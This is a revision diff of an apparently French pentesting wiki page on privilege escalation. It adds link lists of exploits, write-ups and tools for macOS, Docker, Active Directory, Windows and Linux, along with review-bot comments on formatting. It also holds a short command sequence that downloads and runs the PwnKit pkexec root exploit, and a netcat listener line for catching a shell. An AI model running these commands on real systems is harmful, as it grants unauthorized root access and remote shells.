This page shows the differences between the selected revision and the current version of the page.
privilege_escalation [2022/06/21 10:13] M0N5T3R |
privilege_escalation [2024/02/09 20:50] (current version) M0N5T3R |
||
---|---|---|---|
Ligne 1: | Ligne 1: | ||
{{ :privesc.jpg?nolink&1600 |}} | {{ :privesc.jpg?nolink&1600 |}} | ||
+ | |||
+ | ====== MacOs ====== | ||
+ | |||
+ | https://www.ns-echo.com/posts/cve_2023_33298.html | ||
+ | |||
+ | ====== docker ====== | ||
+ | https://flast101.github.io/docker-privesc/ | ||
+ | https://github.com/stealthcopter/deepce | ||
+ | |||
+ | |||
+ | ====== active directory ====== | ||
+ | https://github.com/CravateRouge/bloodyAD | ||
+ | https://github.com/antonioCoco/RemotePotato0 | ||
+ | https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4 | ||
+ | https://github.com/Dec0ne/KrbRelayUp | ||
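Review bot: the new MacOs, docker and active directory sections are bare URLs on consecutive lines with no list markers or descriptions, unlike the tools entries further down, which use a `*` bullet and a one-line summary. Without bullets DokuWiki joins consecutive lines into a single paragraph, and a reader cannot tell which link is a write-up, which is a tool, and what issue each one covers. Suggest one `  * ` item per link with a short description, and consistent heading capitalisation (macOS, Docker, Active Directory) to match the existing Linux heading.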
Ligne 32: | Ligne 47: | ||
**tools :** | **tools :** | ||
+ | |||
+ | * PrivescCheck: This script aims to enumerate common Windows configuration issues that can be leveraged for local privilege escalation. It also gathers various information that might be useful for exploitation and/or post-exploitation. https://github.com/itm4n/PrivescCheck | ||
+ | |||
* WINPEAS Check the Local Windows Privilege Escalation checklist from book.hacktricks.xyz and check more information about how to exploit found misconfigurations in book.hacktricks.xyz https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS | * WINPEAS Check the Local Windows Privilege Escalation checklist from book.hacktricks.xyz and check more information about how to exploit found misconfigurations in book.hacktricks.xyz https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS | ||
Ligne 73: | Ligne 91: | ||
* -> Depuis kali : nc -nlvp 7777 | * -> Depuis kali : nc -nlvp 7777 | ||
+ | |||
+ | |||
+ | |||
+ | |||
+ | **Liste de ressources :** | ||
+ | |||
+ | https://www.redtimmy.com/privilege-escalation/pulse-secure-client-for-windows-9-1-6-toctou-privilege-escalation-cve-2020-13162/ | ||
+ | https://www.mandiant.com/resources/blog/arbitrary-file-deletion-vulnerabilities | ||
+ | https://www.mandiant.com/resources/blog/privileges-third-party-windows-installers | ||
+ | CVE-2024-20656 – Local Privilege Escalation in the VSStandardCollectorService150 Service | ||
+ | https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks | ||
+ | https://github.com/LordNoteworthy/windows-exploitation | ||
+ | https://nixhacker.com/understanding-and-exploiting-symbolic-link-in-windows/ | ||
+ | https://troopers.de/downloads/troopers19/TROOPERS19_AD_Abusing_privileged_file_operations.pdf | ||
+ | https://blog.zecops.com/research/exploiting-smbghost-cve-2020-0796-for-a-local-privilege-escalation-writeup-and-poc/ | ||
+ | https://offsec.almond.consulting/intro-to-file-operation-abuse-on-Windows.html | ||
+ | https://www.cyberark.com/resources/threat-research-blog/follow-the-link-exploiting-symbolic-links-with-ease | ||
+ | https://github.com/Wh04m1001?tab=repositories | ||
+ | https://secret.club/2020/04/23/directory-deletion-shell.html | ||
+ | https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/ | ||
+ | |||
+ | |||
+ | |||
+ | **Liste de writeups** | ||
+ | |||
+ | https://dreamlab.net/en/blog/post/dropbox-escalation-of-privileges-to-system-on-windows-1/ | ||
+ | https://itm4n.github.io/cve-2020-0668-windows-service-tracing-eop/ | ||
+ | https://www.mdsec.co.uk/2024/01/cve-2024-20656-local-privilege-escalation-in-vsstandardcollectorservice150-service/ | ||
+ | https://www.atredis.com/blog/cve-2018-0952-privilege-escalation-vulnerability-in-windows-standard-collector-service | ||
====== Linux ====== | ====== Linux ====== | ||
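Review bot: in the resources list, the entry "CVE-2024-20656 – Local Privilege Escalation in the VSStandardCollectorService150 Service" is a title with no URL, while the matching mdsec.co.uk link is added separately under the writeups list. Suggest attaching the URL to the title in one place and dropping the duplicate. The remaining entries are bare URLs, so a one-line description per link would help, and the two list headings differ in punctuation ("Liste de ressources :" versus "Liste de writeups").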
Ligne 95: | Ligne 142: | ||
**Linux Privilege Escalation using SUID Binaries** | **Linux Privilege Escalation using SUID Binaries** | ||
https://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/ | https://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/ | ||
+ | |||
+ | **Escalate to root using pkexec** | ||
+ | * curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit || exit | ||
+ | * chmod +x PwnKit | ||
+ | * ./PwnKit | ||
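Review bot: the pkexec steps fetch a prebuilt binary from the `main` branch of a third-party repository and execute it, with no pinned commit, no checksum, and no mention of which vulnerability or polkit versions the entry applies to. Content behind a branch URL can change at any time, so what runs on the assessed host is neither reproducible nor auditable. Suggest naming the CVE and affected versions, linking the source, and pinning the download to a commit with a recorded hash (or building from source). Also, `|| exit` on the curl line closes the interactive shell if the download fails when the line is pasted as written; drop it or replace it with an error message.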